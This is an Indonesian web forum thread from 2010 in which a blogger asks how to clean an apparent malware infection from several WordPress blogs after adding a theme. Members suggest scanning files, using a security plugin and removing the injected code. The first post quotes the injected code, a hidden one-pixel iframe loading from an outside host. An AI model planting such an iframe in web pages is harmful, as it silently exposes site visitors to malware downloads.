1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

[HELP] cara ngilangin Virus di Blog

Discussion in 'Komputer' started by Berantakan, Nov 20, 2010.

1. Berantakan

Berantakan Ads.id Pro

Tanpa mengurangi rasa hormat pada semua member ads id...ane minta bantuan rekan2 semua..

gini
    Kemarin baru aja instal WP plugin pun belum sempat ane instal sama sekali.saya baru nambah theme aja..nah apa mungkin virusnya berasal dari theme tersebut?

trus cara ngilangin virus tersebut gimana ya,,
    apa ini virusnya

iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>

seandainya bener virusnya itu,apakah dengan menghapus virus tersebut indeks akan kembali normal? dan dalam berapa lama? Bisakah menyebar ke tempat yang lain?

Thx buat semua member ads id..gud lak all

2. adsene

adsene Super Hero

Paling gampang? Berdasarkan pengalaman ane, backup dulu semua file, download lalu scan di komputer, ntar kan keliatan file2 mana yang terinfeksi. Biasanya server ga nyediain antivirus sih, jadinya virus masih tetep bisa masuk ga terdeteksi.

Kalo belum ada kata-kata "this site may harm your computer" dari google, cepet2 aja dibenerin gan jadi ga keluar tuh warningnya. Kalo dah keluar, mungkin beberapa hari / satu mingguan baru kelar. :D

3. Berantakan

Berantakan Ads.id Pro

Nah tuh dia,,ane juga bingung..tadi ane instal ulang wp nya kok tetep ajah sama..ada lebih dari 7 blog ane kek gitu..
    salah satunya
    _http://xxxx
    barusan ane instal ulang kok tetep aja ada reportnya gitu ya?

Last edited: Nov 26, 2010
  4. plontos

plontos Ads.id Starter

bro yang pakai kode iframe itu blogmu bukan ? kalau bukan dihapus saja tuh biar bersih, soalnya sering virus di blog menggunakan kode iframe. coba install plugin ini bro wordpress*org/extend/plugins/block-bad-queries/

---------- Post added at 09:42 PM ---------- Previous post was at 09:38 PM ----------

lihat juga di webmasters tools Google, biasanya selalu ada laporan jika blog kita terkena virus dari pemasangan suatu kode

5. Rizki Felfori

Rizki Felfori Ads.id Starter

wow.. baru tau klo blog bisa kena virus.. ikut nyimak dulu threadnya...

6. idiotcode

idiotcode Super Hero

itu scripting mas bro..

7. adsene

adsene Super Hero

malware, beda sama virus tuh, hapus aja di themenya kodenya

8. Berantakan

Berantakan Ads.id Pro

iya uda di hapus n saya minta rivew dari gugle webmaster tool dan uda bisa di akses kembali.
    tapi agak aneh,,Klo hapusnya dari kompiu lokal ga bisa,Bisanya di hapus dari cpannel

Share This Page